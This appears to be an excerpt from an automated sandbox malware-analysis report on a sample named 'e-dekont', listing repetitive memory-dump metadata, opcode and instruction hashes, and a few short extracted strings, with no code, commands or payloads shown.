                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: fe818b617671541ddb8948bff606fb0a257a98d3be2876a10646c801e28d696c
                                                        • Instruction ID: 910c0190e9053c44f3e1c3964c82b498dcb03ffbc7299841c7847ec4a3bf8496
                                                        • Opcode Fuzzy Hash: fe818b617671541ddb8948bff606fb0a257a98d3be2876a10646c801e28d696c
                                                        • Instruction Fuzzy Hash: 02C18074E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7572409e33989af388ecc70ec18d018059dd394afbcb25c5828b81611d98fcfe
                                                        • Instruction ID: e298d0b442129029d3015dec3df5d2bf86e0d2bf1d1dd34dde9add1caaaef8d1
                                                        • Opcode Fuzzy Hash: 7572409e33989af388ecc70ec18d018059dd394afbcb25c5828b81611d98fcfe
                                                        • Instruction Fuzzy Hash: 8DC19174E01218CFDB54DFA5C954B9DBBB2BF89300F2080A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d8c8ac8c80a95b69a2def5fe823dbeb228ac3552db2af19b772af1390497ef6
                                                        • Instruction ID: 059a37254ac7471ca9e783209c967bd668fc1c6fa71edb3b5191c3c04ff23094
                                                        • Opcode Fuzzy Hash: 0d8c8ac8c80a95b69a2def5fe823dbeb228ac3552db2af19b772af1390497ef6
                                                        • Instruction Fuzzy Hash: 52C19F74E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 24aa1e752da3a01aacb64fbc3c0ad1cc8dac92461065b876350203091474f963
                                                        • Instruction ID: fb621daf66a38a00520b82532558610aa15fb85e6adc3d5723a4e06b74dcbff8
                                                        • Opcode Fuzzy Hash: 24aa1e752da3a01aacb64fbc3c0ad1cc8dac92461065b876350203091474f963
                                                        • Instruction Fuzzy Hash: 66C19074E00218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 46d2f7fc7a9ae217a5db97720e4448fd95a148169955243a5ab1a615f2e516b8
                                                        • Instruction ID: d7315615f9357642183081c5515b2dc3838ee85d780bdf7d7659041ea7d5a879
                                                        • Opcode Fuzzy Hash: 46d2f7fc7a9ae217a5db97720e4448fd95a148169955243a5ab1a615f2e516b8
                                                        • Instruction Fuzzy Hash: A4C18074E01218CFDB54DFA5C994B9DBBB2BF89300F2481A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 657339956f286fd517396bdf96c58d143f2739d8c953da961ba5d287858d27ef
                                                        • Instruction ID: 8bf1c30b709cf90841d078c87f9b017effbb072dd7dee4187c8424985530663a
                                                        • Opcode Fuzzy Hash: 657339956f286fd517396bdf96c58d143f2739d8c953da961ba5d287858d27ef
                                                        • Instruction Fuzzy Hash: 16C18F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB365DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b940e5e9e792164a63730cc57cf895e8525eaa2873fd46d19a971fdff0c3ae50
                                                        • Instruction ID: 8823268d7532c822827a5581d53aa193091561cc0e59b13e3b6d49053b42c266
                                                        • Opcode Fuzzy Hash: b940e5e9e792164a63730cc57cf895e8525eaa2873fd46d19a971fdff0c3ae50
                                                        • Instruction Fuzzy Hash: BAC19F74E00218CFDB54DFA5D994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a4f82b9931b4bbedeaf332c1e11cbf86b7c525ecc4d2abcbb632a171c444473f
                                                        • Instruction ID: cfc8e49c80a0155934047aa7967d2762ce0de0d72351383e78998e932424c563
                                                        • Opcode Fuzzy Hash: a4f82b9931b4bbedeaf332c1e11cbf86b7c525ecc4d2abcbb632a171c444473f
                                                        • Instruction Fuzzy Hash: 7CC19F74E01218CFDB54DFA5C994B9DBBB2BF89300F2081A9D409AB364DB35AE85CF50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2884851df46d87ca2c3a06eaa747e5210b40b3246cb292579dffbef84b60f906
                                                        • Instruction ID: 38ac3ec746f7ec8b8955c46a4a6b8073edd601b68dcf3f592a8570daf7e47fe5
                                                        • Opcode Fuzzy Hash: 2884851df46d87ca2c3a06eaa747e5210b40b3246cb292579dffbef84b60f906
                                                        • Instruction Fuzzy Hash: 3BA1F274D00218CFDB24DFA9C984B9DBBB1FF88310F249269E409AB3A1DB749985CF51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091126891.0000000005B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 05B40000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_5b40000_e-dekont.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                        • API String ID: 0-2732225958
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4091765112.0000000006C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C00000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_6c00000_e-dekont.jbxd
                                                        Similarity
                                                        • String ID: Xbq$Xbq$Xbq$Xbq
                                                        • API String ID: 0-2732225958
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.4087771511.0000000002DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DC0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_2dc0000_e-dekont.jbxd
                                                        Similarity
                                                        • String ID: \;^q$\;^q$\;^q$\;^q
                                                        • API String ID: 0-3001612457
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%